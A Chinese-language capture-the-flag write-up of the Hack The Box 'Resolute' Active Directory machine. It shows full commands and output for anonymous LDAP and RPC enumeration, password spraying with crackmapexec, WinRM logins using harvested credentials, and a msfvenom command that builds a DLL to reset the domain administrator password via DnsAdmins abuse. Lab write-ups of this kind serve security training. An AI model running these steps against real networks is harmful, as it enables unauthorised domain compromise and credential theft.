HTB打靶(Active Directory 101 Resolute)

news2024/12/23 17:58:52

nmap扫描

nmap -A -T4 10.10.10.169
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-16 01:30 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.65% done; ETC: 01:30 (0:00:01 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.32% done; ETC: 01:32 (0:00:00 remaining)
Nmap scan report for 10.10.10.169
Host is up (0.72s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-16 06:38:20Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/16%OT=88%CT=1%CU=30146%PV=Y%DS=2%DC=T%G=Y%TM=63C4EF9
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:A)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=10B%
OS:TI=I%CI=I%TS=A)OPS(O1=M537NW8ST11%O2=M537NW8ST11%O3=M537NW8NNT11%O4=M537
OS:NW8ST11%O5=M537NW8ST11%O6=M537ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W
OS:5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M537NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=
OS:)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h47m02s, deviation: 4h37m11s, median: 7m00s
| smb2-time:
|   date: 2023-01-16T06:39:12
|_  start_date: 2023-01-16T06:36:35
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2023-01-15T22:39:13-08:00

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   294.26 ms 10.10.16.1
2   294.29 ms 10.10.10.169

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.78 seconds

发现目标机器是域控开放了SMB协议与Rpc协议,593端口可能是DOCOM远程过程对象调用RPC,域名megabank.local

使用windapsearch检查域发现关闭预认证使用AS-REP Roasting攻击拿到域账号

因为网络有点卡我在VPS上挂的隧道连接的HTB正常命令不需要proxychains
命令:proxychains ./windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U
回显:
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] DLL init: proxychains-ng 4.16
    [+] No username provided. Will try anonymous bind.
    [+] Using Domain Controller at: 10.10.10.169
    [+] Getting defaultNamingContext from Root DSE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
    [+]     Found: DC=megabank,DC=local
    [+] Attempting bind
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
    [+]     ...success! Binded as:
    [+]      None

    [+] Enumerating all AD users
    [+]     Found 25 users:

    cn: Guest

    cn: DefaultAccount

    cn: Ryan Bertrand
    userPrincipalName: ryan@megabank.local

    cn: Marko Novak
    userPrincipalName: marko@megabank.local

    cn: Sunita Rahman
    userPrincipalName: sunita@megabank.local

    cn: Abigail Jeffers
    userPrincipalName: abigail@megabank.local

    cn: Marcus Strong
    userPrincipalName: marcus@megabank.local

    cn: Sally May
    userPrincipalName: sally@megabank.local

    cn: Fred Carr
    userPrincipalName: fred@megabank.local

    cn: Angela Perkins
    userPrincipalName: angela@megabank.local

    cn: Felicia Carter
    userPrincipalName: felicia@megabank.local

    cn: Gustavo Pallieros
    userPrincipalName: gustavo@megabank.local

    cn: Ulf Berg
    userPrincipalName: ulf@megabank.local

    cn: Stevie Gerrard
    userPrincipalName: stevie@megabank.local

    cn: Claire Norman
    userPrincipalName: claire@megabank.local

    cn: Paulo Alcobia
    userPrincipalName: paulo@megabank.local

    cn: Steve Rider
    userPrincipalName: steve@megabank.local

    cn: Annette Nilsson
    userPrincipalName: annette@megabank.local

    cn: Annika Larson
    userPrincipalName: annika@megabank.local

    cn: Per Olsson
    userPrincipalName: per@megabank.local

    cn: Claude Segal
    userPrincipalName: claude@megabank.local

    cn: Melanie Purkis
    userPrincipalName: melanie@megabank.local

    cn: Zach Armstrong
    userPrincipalName: zach@megabank.local

    cn: Simon Faraday
    userPrincipalName: simon@megabank.local

    cn: Naoki Yamamoto
    userPrincipalName: naoki@megabank.local


    [*] Bye!

使用Windapsearch检查密码描述

命令:proxychains ./windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
回显:
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    description: Account created. Password set to Welcome123!
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0
    badPasswordTime: 0  
    发现有一个描述信息存在疑似密码Welcome123!

使用rpcclient空会话显示用户列表和描述

这是另一种方式相比上面通过389端口进行查询rpcclient是通过445端口Rpc进行域描述查询的,当然连接一个 samba 或 SMB server 不需要用户名及密码验证才可以使用,
但是从 Windows XP SP2 和 Windows Server 2003 开始系统就不支持空会话的连接了,HTB是开放了空连接但是在护网实战当中关于预认证和开启445空会话的情况很少,都是通过CVE进行
攻击,错误配置会比较少。
命令:proxychains rpcclient -U "" -N 10.10.10.169
回显:
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    WARNING: no network interfaces found
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    rpcclient $>
命令:
    enumdomusers			#枚举用户
回显:
    rpcclient $> enumdomusers
    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[DefaultAccount] rid:[0x1f7]
    user:[ryan] rid:[0x451]
    user:[marko] rid:[0x457]
    user:[sunita] rid:[0x19c9]
    user:[abigail] rid:[0x19ca]
    user:[marcus] rid:[0x19cb]
    user:[sally] rid:[0x19cc]
    user:[fred] rid:[0x19cd]
    user:[angela] rid:[0x19ce]
    user:[felicia] rid:[0x19cf]
    user:[gustavo] rid:[0x19d0]
    user:[ulf] rid:[0x19d1]
    user:[stevie] rid:[0x19d2]
    user:[claire] rid:[0x19d3]
    user:[paulo] rid:[0x19d4]
    user:[steve] rid:[0x19d5]
    user:[annette] rid:[0x19d6]
    user:[annika] rid:[0x19d7]
    user:[per] rid:[0x19d8]
    user:[claude] rid:[0x19d9]
    user:[melanie] rid:[0x2775]
    user:[zach] rid:[0x2776]
    user:[simon] rid:[0x2777]
    user:[naoki] rid:[0x2778]
命令:
    querydispinfo            #显示用户列表和描述
回显:
    rpcclient $> querydispinfo
    index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (nullDesc: (null)
    index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (nullDesc: Built-in account for administering the computer/domain
    index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (nullDesc: (null)
    index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (nullDesc: (null)
    index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (nullDesc: (null)
    index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (nullDesc: (null)
    index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (nullDesc: (null)
    index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (nullDesc: A user account managed by the system.
    index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (nullDesc: (null)
    index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
    index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
    index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (nullDesc: (null)
    index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
    index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (nullDesc: (null)
    index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak  Desc: Account created. Password set to Welcome123!
    index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (nullDesc: (null)
    index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (nullDesc: (null)
    index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (nullDesc: (null)
    index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
    index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan BertrandDesc: (null)
    index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (nullDesc: (null)
    index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (nullDesc: (null)
    index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (nullDesc: (null)
    index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (nullDesc: (null)
    index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (nullDesc: (null)
    index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
    index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
跟上面的windapsearch一样查询描述发现了疑似密码Welcome123!账号是marko
user:password   marko:Welcome123!

crackmapexec验证发现的这个用户

命令:proxychains crackmapexec smb 10.10.10.169 -u marko -p 'Welcome123!' --continue-on-success
回显:
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [*] First time use detected
    [*] Creating home directory structure
    [*] Creating default workspace
    [*] Initializing SMB protocol database
    [*] Initializing SSH protocol database
    [*] Initializing FTP protocol database
    [*] Initializing WINRM protocol database
    [*] Initializing LDAP protocol database
    [*] Initializing RDP protocol database
    [*] Initializing MSSQL protocol database
    [*] Copying default configuration file
    [*] Generating SSL certificate
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:135  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
发现marko账号不正确,那会不会其他账号也使用了这个密码呢,尝试一下密码喷洒攻击。  

在开始密码喷洒攻击之前先检查下域的账号锁定策略防止账号被锁

命令:proxychains ldapsearch -H ldap://10.10.10.169 -x -b 'dc=megabank,dc=local' -s sub "*" | grep lock
回显:
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
    lockoutDuration: -18000000000
    lockOutObservationWindow: -18000000000
    lockoutThreshold: 0
    lockoutDuration: -18000000000
    lockOutObservationWindow: -18000000000
    lockoutThreshold: 0
没有账号锁定策略

喷洒密码Welcome123!

首先将发现的域用户名提取存储到users.txt并使用crackmapexec进行密码喷洒
命令:
    proxychains crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
回显:
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:135  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
    SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
重要信息: SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!
发现melanie账号喷洒成功

使用bloodhound.py收集域信息并分析域信息

命令:python bloodhound.py -d megabank.local -u melanie -p Welcome123! -c all -ns 10.10.10.169
注意的问题:开始的时候我是用了proxychains通过VPS的端口映射去收集域信息但是失败,在VPS上执行的可以抓取信息
bloodhound分析:
    melanie账号具有CanPSRemote权限,可以进行远程登录,下面尝试evil-winrm登录域控。
    CanPSRemote权限权限解释:
        The user MELANIE@MEGABANK.LOCAL has the capability to create a PSRemote Connection with the computer RESOLUTE.MEGABANK.LOCAL.
        PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, 
        a privilege escalation may allow you to gain high privileges on the system.
        Note: This edge does not guarantee privileged execution.

请添加图片描述

使用evil-winrm登录域控

命令:proxychains evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

登录域控后进行信息收集

信息收集发现了C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt文件,PSTranscripts目录是隐藏的,
需要使用dir -force进行发现。
使用download命令将文件下载到本地进行分析,文件内容:  
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063201
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    Command start time: 20191203063455
    **********************
    PS>TerminatingError(): "System error."
    >> CommandInvocation(Invoke-Expression): "Invoke-Expression"
    >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
    if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
    >> CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="Stream"; value="True"
    **********************
    Command start time: 20191203063455
    **********************
    PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
    PS megabank\ryan@RESOLUTE Documents>
    **********************
    Command start time: 20191203063515
    **********************
    PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
    >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

    if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
    >> CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="Stream"; value="True"
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063515
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    **********************
    Command start time: 20191203063515
    **********************
    PS>CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
    cmd : The syntax of this command is:
    At line:1 char:1
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    cmd : The syntax of this command is:
    At line:1 char:1
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063515
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
重要信息:
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
可以看出发现这个文件是powershell执行信息记录日志文件可能是启用了PowerShell转录日志记录在这里面发现了MEGABANK\ryan:Serv3r4Admin4cc123!使用bloodhound进行分析下该账号。
分析结果:
MEGABANK\ryan用户隶属于CONTRACTORS@MEGABANK.LOCAL的成员
CONTRACTORS@MEGABANK.LOCAL组对域控具有CanPSRemote权限可以进远程登录
在bloodhound中显示MEGABANK\ryan账号信息Unrolled Group Membership发现一下内容:
MEGABANK\ryan用户隶属于CONTRACTORS@MEGABANK.LOCAL的成员
CONTRACTORS@MEGABANK.LOCAL是组DNSADMINS@MEGABANK.LOCAL的成员

思路整理:
    ryan账号具有CanPSRemote权限尝试能否登录到域控,登录成功后因为ryan账号属于CONTRACTORS@MEGABANK.LOCAL组, CONTRACTORS@MEGABANK.LOCAL组有属于DNSADMINS@MEGABANK.LOCAL的成员,
    可以尝试下滥用DNS Admin组进行权限提升后拿到system权限从而完全控制域控。

DNS Admin组权限滥用获取system权限

Evil命令登录:
    proxychains evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
查看bloodhound分析的是否正确,ryan是否属于DNSADMIN组,使用whoami /groups命令进行查看
回显:
    *Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:5985  ...  OK
    [proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:5985  ...  OK

    GROUP INFORMATION
    -----------------

    Group Name                                 Type             SID
                                Attributes
    ========================================== ================ ============================================== ===============================================================
    Everyone                                   Well-known group S-1-1-0
                                Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                       Well-known group S-1-5-2
                                Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
    MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
确实属于MEGABANK\DnsAdmins组
DNS Admin组描述:
    DNSAdmins 组的成员可以访问网络DNS信息,默认权限如下:读取、写入、创建所有子对象、删除子对象、特殊权限,
    DNSAdmins 没有启动或停止 DNS 服务的能力,但管理员授予该组成员该权限并不罕见,当dnsadmins 组的成员被授予该权限时可用于通过 dll 注入将权限提升到管理员。
 DNS Admin组提权参考文章:
    https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2
    http://t.zoukankan.com/backlion-p-9888851.html

攻击利用:
    msfvenom生成利用dll命令:
        msfvenom -p windows/x64/exec cmd='net user administrator Hack@123! /domain' -f dll > 666.dll
    会在当前目录下生成666.dll,administrator:Hack@123!账号用于登录
    回显:
        [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
        [-] No arch selected, selecting arch: x64 from the payload
        No encoder specified, outputting raw payload
        Payload size: 308 bytes
